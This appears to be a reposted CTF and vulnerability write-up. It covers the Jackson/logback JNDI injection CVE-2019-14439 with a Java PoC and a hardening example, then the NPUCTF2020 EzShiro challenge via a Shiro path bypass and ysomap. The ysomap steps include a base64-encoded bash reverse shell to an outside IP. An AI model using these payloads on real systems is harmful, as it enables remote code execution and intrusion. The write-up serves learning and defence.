CVE-2019-14439
A JNDI injection via logback. I could not find a detailed analysis article, so I took a quick look at it alongside the PoCs circulating online;
the sink is in the class ch.qos.logback.core.db.JNDIConnectionSource.


The root cause is not complicated: a very clear and straightforward JNDI injection reached through Jackson default typing.
PoC
package Jackson;

import com.fasterxml.jackson.databind.ObjectMapper;

import java.io.IOException;

public class logback {
    public static void main(String[] args) throws IOException {
        // Default-typing payload: the first element names the class to instantiate,
        // the second element supplies its properties.
        String json = "[\"ch.qos.logback.core.db.JNDIConnectionSource\"," +
                "{\"jndiLocation\":\"ldap://127.0.0.1:1089/Exploit\"}]";
        ObjectMapper mapper = new ObjectMapper();
        // Global default typing: any class name found in the input is accepted.
        mapper.enableDefaultTyping();
        Object o = mapper.readValue(json, Object.class);
        // Serializing calls the getters; getConnection() performs the JNDI lookup of jndiLocation.
        mapper.writeValueAsString(o);
    }
}
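The two ObjectMapper set-ups side by side, as an added example that is not part of the original post: the PoC's permissive global default typing, and the Jackson 2.10+ allow-list validator that refuses the gadget's type id before any object is created. The application package `com.example.model.` and the LDAP host are placeholders.

```java
import com.fasterxml.jackson.databind.JsonMappingException;
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.jsontype.BasicPolymorphicTypeValidator;
import com.fasterxml.jackson.databind.jsontype.PolymorphicTypeValidator;

public class DefaultTypingCheck {
    // Same shape as the PoC on this page: [ "<class name>", { properties } ].
    // Placeholder host; nothing is contacted because the object is never serialized here.
    static final String PAYLOAD =
        "[\"ch.qos.logback.core.db.JNDIConnectionSource\","
        + "{\"jndiLocation\":\"ldap://attacker.invalid/Exploit\"}]";

    // Vulnerable set-up as in the PoC: global default typing, every class name accepted.
    @SuppressWarnings("deprecation")
    static ObjectMapper permissiveMapper() {
        ObjectMapper m = new ObjectMapper();
        m.enableDefaultTyping();
        return m;
    }

    // Hardened set-up (Jackson 2.10+): default typing only for an allow-listed
    // application package. "com.example.model." is a hypothetical package name.
    static ObjectMapper hardenedMapper() {
        PolymorphicTypeValidator ptv = BasicPolymorphicTypeValidator.builder()
            .allowIfSubType("com.example.model.")
            .build();
        ObjectMapper m = new ObjectMapper();
        m.activateDefaultTyping(ptv, ObjectMapper.DefaultTyping.NON_FINAL);
        return m;
    }

    // Returns the mapping error raised for PAYLOAD, or null if the gadget was instantiated.
    static String tryDeserialize(ObjectMapper m) {
        try {
            m.readValue(PAYLOAD, Object.class);
            return null;
        } catch (JsonMappingException e) {
            return e.getOriginalMessage();
        } catch (java.io.IOException e) {
            return e.getMessage();
        }
    }

    public static void main(String[] args) {
        // With logback-core on the classpath the permissive mapper builds the gadget (null);
        // the hardened mapper reports that the PolymorphicTypeValidator denied the type id.
        System.out.println("permissive: " + tryDeserialize(permissiveMapper()));
        System.out.println("hardened:   " + tryDeserialize(hardenedMapper()));
    }
}
```

Jackson's own blocklist gained this class in jackson-databind 2.9.9.2, but an allow-list makes the result independent of whether the next gadget class has been catalogued yet.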

[NPUCTF2020]EzShiro
I could not solve it at first; from the write-up I later learned that the attachment included a pom.xml, which BUU apparently did not provide:
<dependencies>
    <dependency>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-web</artifactId>
    </dependency>
    <dependency>
        <groupId>org.apache.shiro</groupId>
        <artifactId>shiro-web</artifactId>
        <version>1.5.1</version>
    </dependency>
    <dependency>
        <groupId>org.apache.shiro</groupId>
        <artifactId>shiro-spring</artifactId>
        <version>1.5.1</version>
    </dependency>
    <dependency>
        <groupId>ch.qos.logback</groupId>
        <artifactId>logback-core</artifactId>
        <version>1.2.1</version>
    </dependency>
    <dependency>
        <groupId>commons-collections</groupId>
        <artifactId>commons-collections</artifactId>
        <version>3.2.1</version>
    </dependency>
</dependencies>
Seeing logback in there, the first step is the Shiro authorization bypass to reach /json by visiting /;/json.
POSTing a bare true shows Jackson in the response.

Jackson + logback should therefore be CVE-2019-14439; the source presumably uses Jackson to deserialize the POSTed JSON data.
But I ran into a problem: a direct attempt did not go through, and there seems to be an additional restriction to bypass here.
The write-up I looked at references this article, which mentions the issue:
https://paper.seebug.org/942/#ldapgadget

The challenge's JVM version is presumably too recent, so the gadget chain bundled with the challenge has to be loaded instead; the pom includes commons-collections.
The write-up goes straight to the ysomap tool. I had not used it in a competition before, so I learned it along the way:
https://github.com/wh1t3p1g/ysomap
use exploit LDAPLocalChainListener
set lport 6688
use payload CommonsCollections8
use bullet TransformerBullet
set version 3
set command 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjQuNzAuNDAuNS8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}'
run
Using this tool requires JDK 8, and the JDK 8 build must not be too old.

The shell came back successfully; after finals I will study the tool's source code.
Please credit the source when reposting. Link to this article: https://www.uj5u.com/qita/390719.html
